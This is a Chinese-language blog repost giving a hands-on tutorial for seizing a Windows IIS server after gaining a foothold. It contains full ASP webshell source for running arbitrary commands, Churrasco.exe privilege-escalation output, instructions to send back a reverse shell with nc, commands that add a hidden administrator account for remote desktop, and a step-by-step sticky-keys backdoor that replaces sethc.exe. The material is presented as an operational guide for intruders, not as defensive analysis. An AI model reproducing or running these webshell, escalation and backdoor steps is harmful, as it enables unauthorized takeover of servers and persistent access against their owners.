启用shift后门的方法_服务器可以拿来干什么

2022-10-02 11:17:11 浏览数 (1)

大家好,又见面了,我是你们的朋友全栈君。

提权工具如下:cmd.exe Churrasco.exe nc.exe

提权前提:Wscript组件成功开启

如果Wscript组件被关闭,则使用以下方法开启:

源代码:

<object runat=server id=oScriptlhn scope=page classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object>

<%if err then%>

<object runat=server id=oScriptlhn scope=page classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>

<%

end if %>

<form method=”post”>

<input type=text name=”cmdx” size=60 value=”C:RECYCLERcmd.exe”><br>

<input type=text name=”cmd” size=60><br>

<input type=submit value=”net user”></form>

<textarea readonly cols=80 rows=20>

<%On Error Resume Next

if request(“cmdx”)=”C:RECYCLERcmd.exe” then

response.write oScriptlhn.exec(“cmd.exe /c”&request(“cmd”)).stdout.readall

end if

response.write oScriptlhn.exec(request(“cmdx”)&” /c”&request(“cmd”)).stdout.readall

%>

</textarea>

将源代码保存为1.asp并上传到webshell里,IE访问1.asp,如没有出错等就说明可以执行CMD命令!

下面先来将Churrasco.exe怎么用才能更好的发挥它的作用!有很多朋友问我为什么我上传的Churrasco.exe执行命令时没有出现命令成功 原因有几种这里我就不多说了!那么这时我们要想到Churrasco.exe行命令时没有出现命令成功 但出现/churrasco/–>Current User: NETWORK SERVICE

/churrasco/–>Getting Rpcss PID …

/churrasco/–>Found Rpcss PID: 696

/churrasco/–>Searching for Rpcss threads …

/churrasco/–>Found Thread: 444

/churrasco/–>Thread not impersonating, looking for another thread…

/churrasco/–>Found Thread: 700

/churrasco/–>Thread not impersonating, looking for another thread…

/churrasco/–>Found Thread: 704

/churrasco/–>Thread not impersonating, looking for another thread…

/churrasco/–>Found Thread: 712

/churrasco/–>Thread impersonating, got NETWORK SERVICE Token: 0xf24

/churrasco/–>Getting SYSTEM token from Rpcss Service…

/churrasco/–>Found szywjs Token

/churrasco/–>Found SYSTEM token 0xf1c

/churrasco/–>Running command with SYSTEM Token…

直到这里 没有出现命令执行成功 那么这时你千万不要放弃!离成功加差一步!这里你就用NC进行反弹一个CMDSHELL看下如果反弹回来的CMDSHELL权限很大的话那我就不用说了!如果说权限很小的这里你也有很大的希望了!

在反弹回来的CMDSHELL里执行 C:RECYCLERChurrasco.exe “net user iisuser iisuser /add”   C:RECYCLERChurrasco.exe “net localgroup administrators iisuser /add”   C:RECYCLERChurrasco.exe 这里是你所传到的目录!这样可以说90%的出现命令执行成功!这样就可以进行3389连接了!   如果说这时没有出现命令执行成功 下面我就再告诉你一种方法!   如下 依次执行:   attrib c:windowssystem32sethc.exe -h -r -s   attrib c:windowssystem32dllcachesethc.exe -h -r -s   del c:windowssystem32sethc.exe   copy c:windowsexplorer.exe c:windowssystem32sethc.exe   copy c:windowssystem32sethc.exe c:windowssystem32dllcachesethc.exe   attrib c:windowssystem32sethc.exe h r s   attrib c:windowssystem32dllcachesethc.exe h r s   如果出现拒绝等错误 那就没法了!如果说这台服务器先是被别人拿过了做了shift后门 那么就是100%成功!本人亲自   用这方法成功替换过别人带有密码的SHIFT后门!   还有一点就是在webSHELL里或CMDSHELL下也可以这样执行!   C:RECYCLERChurrasco.exe “copy d:windowsexplorer.exe d:windowssystem32sethc.exe”   C:RECYCLERChurrasco.exe “copy d:windowssystem32sethc.exe d:windowssystem32dllcachesethc.exe “   还有就是attrib 加属性等也可以这样执行!还有一点忘了就是在反弹回来的CMDSHELL里用这种方法也可以!   这样就可以利用SHIft后门成功拿下服务器了。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/192217.html原文链接:https://javaforall.cn

0 人点赞